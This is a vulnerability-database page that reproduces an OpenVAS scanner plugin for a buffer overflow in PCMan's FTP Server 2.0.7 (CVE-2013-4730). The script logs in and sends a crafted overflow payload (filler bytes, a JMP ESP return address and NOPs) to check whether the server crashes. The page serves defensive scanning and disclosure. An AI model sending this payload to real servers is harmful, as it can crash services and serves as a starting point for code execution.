Lucene search
K

PCMan's FTP Server Multiple Vulnerabilities

🗓️ 02 Jul 2013 00:00:00Reported by Copyright (C) 2013 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 15 Views

PCMan's FTP Server Multiple Vulnerabilities allowing remote attacker to read, write arbitrary files or cause denial of servic

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-4730
22 Jul 201300:00
circl
CVE
CVE-2013-4730
15 May 201414:00
cve
Cvelist
CVE-2013-4730
15 May 201414:00
cvelist
Metasploit
PCMAN FTP Server Buffer Overflow - PUT Command
26 Jan 201623:09
metasploit
Metasploit
PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
20 Sep 201317:18
metasploit
NVD
CVE-2013-4730
15 May 201414:55
nvd
OpenVAS
PCMan's FTP Server Multiple Vulnerabilities
2 Jul 201300:00
openvas
OpenVAS
PCMAN FTP Server STOR Command Buffer Overflow vulnerability
21 Aug 201300:00
openvas
OpenVAS
PCMAN FTP Server MKD Command Buffer Overflow vulnerability
25 Feb 201500:00
openvas
Prion
Buffer overflow
15 May 201414:55
prion
Rows per page
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_pcman_ftp_server_mult_vuln.nasl 6115 2017-05-12 09:03:25Z teissa $
#
# PCMan's FTP Server Multiple Vulnerabilities
#
# Authors:
# Thanga Prakash S <[email protected]>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow a remote attacker to read or
write arbitrary files or cause denial of service condition result in loss of
availability for the application.

Impact Level: Application";

tag_affected = "PCMan's FTP Server version 2.0.7";

tag_insight = "Improper sanitation of user supplied input via 'PAYLOAD', 'EIP',
'USER', 'PASS', 'DIR', 'PUT' and 'NOP' parameters.";

tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";

tag_summary = "The remote host is installed with PCMan's FTP Server and is
prone to multiple vulnerabilities.";

if(description)
{
  script_id(803825);
  script_version("$Revision: 6115 $");
  script_cve_id("CVE-2013-4730");
  script_bugtraq_id(65289, 65299);
  script_tag(name:"last_modification", value:"$Date: 2017-05-12 11:03:25 +0200 (Fri, 12 May 2017) $");
  script_tag(name:"creation_date", value:"2013-07-02 11:35:46 +0530 (Tue, 02 Jul 2013)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("PCMan's FTP Server Multiple Vulnerabilities");
  script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/26495");
  script_xref(name : "URL" , value : "http://packetstormsecurity.com/files/122173/pcman-traversal.txt");
  script_xref(name : "URL" , value : "http://exploitsdownload.com/exploit/na/pcmans-ftp-server-20-denial-of-service");
  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("Copyright (C) 2013 Greenbone Networks GmbH");
  script_family("FTP");
  script_dependencies("secpod_ftp_anonymous.nasl");
  script_require_ports("Services/ftp", 21);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}


##
## The script code starts here
##

include("ftp_func.inc");

## Variable Initialization
ftplogin = "";
ftpPort = "";
banner = "";
user = "";
pass = "";
soc = "";

## Get the ftp port from KB
ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
  ftpPort = 21;
}

## Check Port status
if(!get_port_state(ftpPort)){
  exit(0);
}

## Confirm the Application
banner = get_ftp_banner(port:ftpPort);
if("220 PCMan's FTP Server" >!< banner){
  exit(0);
}

## Get Username from KB, If not given use default Username
user = get_kb_item("ftp/login");
if(!user){
  user = "anonymous";
}

## Get Password from KB, If not given use default Password
pass = get_kb_item("ftp/password");
if(!pass){
  pass = "anonymous";
}

## Open the socket
soc = open_sock_tcp(ftpPort);
if(!soc) exit(0);

## Login to the ftp server
ftplogin = ftp_log_in(socket:soc, user:user, pass:pass);
if(!ftplogin) exit(0);

## Construct the crafted request
PAYLOAD = crap(data: "\x41", length:2010);
EIP     = "\xDB\xFC\x1C\x75";  # 751CFCDB   JMP ESP USER32.DLL
NOP     = crap(data: "\x90", length:10);

## Send specially crafted RETR command
send(socket:soc, data:string(PAYLOAD, EIP, NOP, '\r\n'));

## Close FTP Socket
ftp_close(socket:soc);

## Confirm the Exploit by opening socket
soc = open_sock_tcp(ftpPort);
if(!soc)
{
  security_message(ftpPort);
  exit(0);
}

## Confirm the Exploit by login
ftplogin = ftp_log_in(socket:soc, user:user, pass:pass);
if(!ftplogin)
{
  security_message(ftpPort);
  exit(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 May 2017 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.74482
15